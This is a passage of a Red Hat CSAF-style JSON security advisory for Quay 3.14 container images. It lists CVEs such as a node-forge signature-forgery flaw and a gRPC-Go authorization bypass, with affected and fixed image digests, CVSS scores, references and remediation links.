            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "google.golang.org/grpc/grpc-go: google.golang.org/grpc/authz: gRPC-Go: Authorization bypass due to improper HTTP/2 path validation"
    },
    {
      "cve": "CVE-2026-33894",
      "cwe": {
        "id": "CWE-347",
        "name": "Improper Verification of Cryptographic Signature"
      },
      "discovery_date": "2026-03-27T21:02:52.462999+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2452464"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Forge (also called `node-forge`), a JavaScript implementation of Transport Layer Security. A remote attacker could exploit weaknesses in the RSASSA PKCS#1 v1.5 signature verification process. By crafting malicious signatures that include extra data within the ASN structure and do not meet padding requirements, an attacker can bypass signature validation. This allows for the creation of forged signatures that appear legitimate, potentially compromising the integrity and authenticity of communications.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "node-forge: Forge: Signature Forgery via Weak RSASSA PKCS#1 v1.5 Verification",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-33894"
        },
        {
          "category": "external",
          "summary": "RHBZ#2452464",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2452464"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-33894",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-33894"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-33894",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33894"
        },
        {
          "category": "external",
          "summary": "https://datatracker.ietf.org/doc/html/rfc2313#section-8",
          "url": "https://datatracker.ietf.org/doc/html/rfc2313#section-8"
        },
        {
          "category": "external",
          "summary": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-ppp5-5v6c-4jwp",
          "url": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-ppp5-5v6c-4jwp"
        },
        {
          "category": "external",
          "summary": "https://mailarchive.ietf.org/arch/msg/openpgp/5rnE9ZRN1AokBVj3VqblGlP63QE",
          "url": "https://mailarchive.ietf.org/arch/msg/openpgp/5rnE9ZRN1AokBVj3VqblGlP63QE"
        },
        {
          "category": "external",
          "summary": "https://www.rfc-editor.org/rfc/rfc8017.html",
          "url": "https://www.rfc-editor.org/rfc/rfc8017.html"
        }
      ],
      "release_date": "2026-03-27T20:45:49.583000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-26T17:12:40+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11458",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:21017"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "node-forge: Forge: Signature Forgery via Weak RSASSA PKCS#1 v1.5 Verification"
    },
    {
      "cve": "CVE-2026-34986",
      "cwe": {
        "id": "CWE-131",
        "name": "Incorrect Calculation of Buffer Size"
      },
      "discovery_date": "2026-04-06T17:01:34.639203+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
